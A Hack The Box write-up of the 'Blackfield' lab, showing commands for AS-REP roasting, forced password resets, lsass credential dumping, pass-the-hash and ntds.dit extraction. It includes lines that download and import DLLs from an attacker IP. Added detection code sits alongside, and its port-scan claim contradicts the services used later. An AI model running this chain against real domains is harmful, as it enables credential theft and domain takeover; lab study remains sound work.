Blackfield-HTB

cY83rR0H1t
7 min read · May 11, 2021

Summary

Blackfield is a hard-level Hack The Box machine. We get an anonymous login to the SMB shares and enumerate the profiles$ share, where we find a long list of usernames. We use an AS-REP roasting attack (the box's Kerberos pre-authentication weakness) against Active Directory to obtain credentials, then use rpcclient to change another user's password, which gives us access to the forensic share and from there to the machine. Root involves abusing SeBackupPrivilege with diskshadow to copy the domain database and get an administrator shell.

Methodology

  • SMB anonymous login
  • enumerate the profiles$ share
  • generate a TGT for a valid user (AS-REP roast)
  • rpcclient login
  • enumerate privileges and change the audit2020 password
  • find an lsass.zip file
  • unzip the file and dump NTLM hashes with pypykatz
  • log in as svc_backup -> user flag
  • enumerate privileges -> svc_backup can back up files
  • use diskshadow to create a new volume aliasing c:
  • obtain ntds.dit
  • save the SYSTEM registry hive
  • dump the NTLM hashes with secretsdump.py
  • log in as Administrator -> root flag

Foothold

After the port scan we found two open ports, port 22 and port 80.

Note: the command and its flags are explained here.

  • -sC: scan with the default Nmap scripts.
  • -sV: version detection.
  • -oA: write the output in all three major formats at once.

#Command
$ nmap -sC -sV -oA nmap 10.10.10.192

Looking at the Nmap result we see that Kerberos is running and that the machine's domain is BLACKFIELD.local.

First, we enumerated the SMB shares with smbclient.

#Command
$ smbclient -L //10.10.10.192 -N

We notice that two shares, forensic and profiles$, look interesting. We get access denied on the forensic share, so we move on to profiles$.

#Command
$ smbclient //10.10.10.192/profiles$ -N

We get a long list of usernames. Looking closely, the names run through the alphabet in sequence (the first letter of each name follows A to Z), so we keep only the names that break that sequence. After filtering we are left with 9 usernames.

AS-REP

Since we now have a list of users, we can use the GetNPUsers.py script from the impacket library, which performs an AS-REP roasting attack to try to obtain a crackable hash from the TGT response. We used the username SUPPORT.

As we already have the domain name blackfield.local we use that for the command.

We used GetNPUsers.py to check which users have the "Do not require Kerberos pre-authentication" property (the DONT_REQUIRE_PREAUTH bit) set. If this bit is set we can retrieve a TGT (Ticket Granting Ticket) for that user without performing Kerberos pre-authentication.

Pre-authentication is the first step of Kerberos authentication; its main purpose is to stop brute-force password guessing. With pre-auth, the user's credentials are used to encrypt a timestamp, and the Domain Controller decrypts it to verify that the correct credential was used. If the DC verifies it, it issues a TGT. If pre-authentication is disabled, however, anyone can request a ticket for that user and the DC simply returns a TGT, part of which is encrypted with a key derived from the user's password and can therefore be cracked offline.

AS-REP roast: the GetNPUsers.py script can be used from a Linux machine to harvest the AS-REP responses of accounts that do not require pre-authentication.
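The defender's side of this: the request GetNPUsers.py makes shows up in the Domain Controller's Security log as event 4768 with Pre-Authentication Type 0 and an RC4 ticket, and the accounts it works against carry the DONT_REQUIRE_PREAUTH bit in userAccountControl. The following is an added detection and audit example, not code from the write-up; the event records and usernames are constructed.

```python
"""Flag AS-REP roasting in Security event 4768 (Kerberos TGT requested).

Added defensive example, not from the original write-up. A 4768 with
Pre-Authentication Type 0 and RC4 (0x17) ticket encryption is the exact
exchange GetNPUsers.py performs against an account that has the
DONT_REQUIRE_PREAUTH bit (0x400000) set. Sample events are constructed.
"""
from dataclasses import dataclass

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit named in the write-up


@dataclass(frozen=True)
class Event4768:
    target_user: str
    client_ip: str
    pre_auth_type: int    # 0 = none, 2 = PA-ENC-TIMESTAMP (normal logon)
    ticket_enc_type: int  # 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96
    result_code: int      # 0x0 = ticket issued, 0x6 = principal unknown


def has_dont_req_preauth(user_account_control: int) -> bool:
    """Audit helper: does this userAccountControl value skip pre-auth?"""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def is_asrep_roast_candidate(ev: Event4768) -> bool:
    """A TGT issued with no pre-authentication and an RC4 ticket is the
    artefact an AS-REP roaster collects for offline cracking."""
    return (ev.result_code == 0
            and ev.pre_auth_type == 0
            and ev.ticket_enc_type == 0x17)


def find_roasted_accounts(events):
    """Return the {(user, source_ip)} pairs worth an alert."""
    return {(e.target_user, e.client_ip)
            for e in events if is_asrep_roast_candidate(e)}


# Constructed sample: one roast, one normal AES logon, one failed request.
SAMPLE_EVENTS = [
    Event4768("support", "10.10.14.11", 0, 0x17, 0x0),
    Event4768("audit2020", "10.10.10.5", 2, 0x12, 0x0),
    Event4768("nobody", "10.10.14.11", 0, 0x17, 0x6),
]

if __name__ == "__main__":
    for user, ip in sorted(find_roasted_accounts(SAMPLE_EVENTS)):
        print(f"possible AS-REP roast of {user} from {ip}")
```

The fix for any account the audit helper flags is to clear the bit and rotate the password, since its previous AS-REP may already have been captured.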

#Command
$ python /opt/impacket/examples/GetNPUsers.py blackfield.local/support -dc-ip 10.10.10.192 -format hashcat -outputfile hashes.asreproast -no-pass

After obtaining the hash from the TGT response we used John the Ripper to crack it.

#Command
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast

John the Ripper gave us the password '#00^BlackKnight'. Now we log in to the SYSVOL share with the support username.

#Command
$ smbclient \\\\10.10.10.192\\SYSVOL -U support

We use the same cracked password to log in with rpcclient.

#Command
$ rpcclient -U support 10.10.10.192

We query the user audit2020 and find that we are able to change this user's password.

#Command
rpcclient $> queryuser audit2020

To change the password, use the setuserinfo2 command (level 5, followed by the new password):

#Command
rpcclient $> setuserinfo2 audit2020 5 'rohit'

Log in to the forensic share with the new credentials.

#Command
$ smbclient \\\\10.10.10.192\\forensic -U audit2020

We copied all the files to our system with a few smbclient commands:

#Command
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

After enumerating all the files we come across an lsass.zip file. Unzipping it gives an lsass.DMP file.

A .DMP file is a memory dump, created when a program crashes or when a process's memory is deliberately dumped; this one is a dump of the lsass process, which holds logon credentials. We can therefore extract useful information such as NTLM hashes from it with Mimikatz. I used my Windows system to process the dump.

#Command
mimikatz # privilege::debug
mimikatz # sekurlsa::minidump C:\Users\ROHIT\Downloads\x64\lsass.DMP
mimikatz # sekurlsa::logonpasswords

Now we have the svc_backup user's hash. We log in with evil-winrm (pass-the-hash) and get the first, user, flag.

#Command
$ ./evil-winrm.rb -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'

Privilege Escalation

After checking the user's privileges, we find that SeBackupPrivilege is enabled.

What is DiskShadow?
DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.

What is ntds.dit?
All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller. Amongst other kinds of information, "the dit" contains user accounts and their password hashes, which an adversary can use in later stages of an attack. The file is locked while the DC is running, which is why a shadow copy is needed to read it.

#Command
$ whoami /priv

We have the SeBackupPrivilege privilege. This gives us the right to create a shadow copy of the volume holding the NTDS file that contains the credentials. Even after the copy is created, however, we cannot simply copy the file out with normal file operations; we need a copy routine that opens the file with the backup privilege.

Let's make a shadow copy. Create a file with the following content (the alias set on the add volume line is the variable referenced by expose):

SET CONTEXT PERSISTENT
begin backup
add volume c: alias evil
create
expose %evil% z:

Save it as script.txt

#Command
$ Invoke-WebRequest "http://10.10.14.11:8000/dis.txt" -OutFile c:\Windows\Temp\script.txt

Create the shadow copy by running the script:

#Command
$ diskshadow /s script.txt

Now we need to upload and import two DLLs that let PowerShell copy files the way backup software does (using SeBackupPrivilege):

#Command
$ Invoke-WebRequest "http://10.10.14.11:8000/SeBackupPrivilegeUtils.dll" -OutFile c:\Windows\Temp\SeBackupPrivilegeUtils.dll
$ Invoke-WebRequest "http://10.10.14.11:8000/SeBackupPrivilegeCmdLets.dll" -OutFile c:\Windows\Temp\SeBackupPrivilegeCmdLets.dll
$ Import-Module c:\Windows\Temp\SeBackupPrivilegeUtils.dll
$ Import-Module c:\Windows\Temp\SeBackupPrivilegeCmdLets.dll

Reference:

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Then we copy ntds.dit from the exposed shadow copy (drive z:) to our temp directory so we can download it:

#Command
$ Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

We also save two registry hives; the SYSTEM hive holds the boot key needed to decrypt the hashes in ntds.dit.

#Command
$ reg.exe save HKLM\SAM C:\Windows\Temp\sam.save
$ reg.exe save HKLM\SYSTEM C:\Windows\Temp\system.save

We downloaded all three files, i.e. sam.save, system.save and ntds.dit, with evil-winrm's download command.

#Command
$ download sam.save
$ download system.save
$ download ntds.dit

We used impacket's secretsdump.py to dump the hashes from the offline files.

#Command
$ impacket-secretsdump -sam sam.save -system system.save -ntds ntds.dit LOCAL

Reference:

https://www.bordergate.co.uk/extracting-windows-credentials-using-native-tools/
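From the blue-team side, the privilege-escalation chain above leaves a recognisable trail in process-creation logging (Security event 4688 with command-line auditing enabled, or PowerShell script-block logs): diskshadow run with a script file, reg save of the SAM and SYSTEM hives, and a copy of ntds.dit. The following is an added detection example, not code from the write-up; the command lines are constructed and the rule set is this example's own.

```python
"""Correlate command lines from Security event 4688 (process creation) into
the shadow-copy credential-dump chain used in the write-up: diskshadow run
with a script, reg save of HKLM\\SAM or HKLM\\SYSTEM, and copying ntds.dit.

Added defensive example, not from the original post; the sample command
lines are constructed and the rule set is this example's own choice.
"""
import re
from collections import defaultdict

# Windows paths and switches are case-insensitive, so every rule is too.
RULES = [
    ("diskshadow-script", re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I)),
    ("reg-save-sam-system",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b", re.I)),
    ("ntds-copy", re.compile(r"ntds\.dit", re.I)),
    ("sebackup-cmdlet", re.compile(r"\bCopy-FileSeBackupPrivilege\b", re.I)),
]


def classify(cmdline: str):
    """Labels of every rule a single command line triggers."""
    return [label for label, pat in RULES if pat.search(cmdline)]


def score_hosts(events, min_labels=2):
    """events: iterable of (host, user, cmdline). Returns {host: set(labels)}
    for hosts where at least min_labels distinct rules fired. One rule alone
    (a scheduled reg save, say) is noise; the combination is the chain."""
    hits = defaultdict(set)
    for host, _user, cmdline in events:
        hits[host].update(classify(cmdline))
    return {h: s for h, s in hits.items() if len(s) >= min_labels}


# Constructed sample events: the chain on DC01, benign activity on WS07.
SAMPLE_4688 = [
    ("DC01", r"BLACKFIELD\svc_backup", r"diskshadow /s C:\Windows\Temp\script.txt"),
    ("DC01", r"BLACKFIELD\svc_backup", r"reg.exe save HKLM\SYSTEM C:\Windows\Temp\system.save"),
    ("DC01", r"BLACKFIELD\svc_backup", r"reg.exe save HKLM\SAM C:\Windows\Temp\sam.save"),
    ("WS07", r"BLACKFIELD\audit2020", r"reg.exe save HKLM\SOFTWARE\Policies C:\tmp\pol.hiv"),
    ("WS07", r"BLACKFIELD\audit2020", r"notepad.exe C:\Users\audit2020\notes.txt"),
]

if __name__ == "__main__":
    for host, labels in score_hosts(SAMPLE_4688).items():
        print(f"{host}: {', '.join(sorted(labels))}")
```

Limiting membership of Backup Operators (the group that grants SeBackupPrivilege on a DC) to accounts that actually run backups shrinks the population this rule has to watch.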

With all the hashes dumped, we use the Administrator hash.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::

We can use either evil-winrm or impacket's psexec.py to authenticate with the hash. Here I used psexec.py.

#Command
$ ./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee Administrator@10.10.10.192

And we successfully got the root shell.

Thanks for reading.

Hack The Box Profile: https://www.hackthebox.eu/profile/116842

cY83rR0H1t

MSc CyberSecurity |Cybersecurity researcher | OSCP | CRTO | CRTP |eCPPTv2 | eJPT | Hack The Box player | CTF player |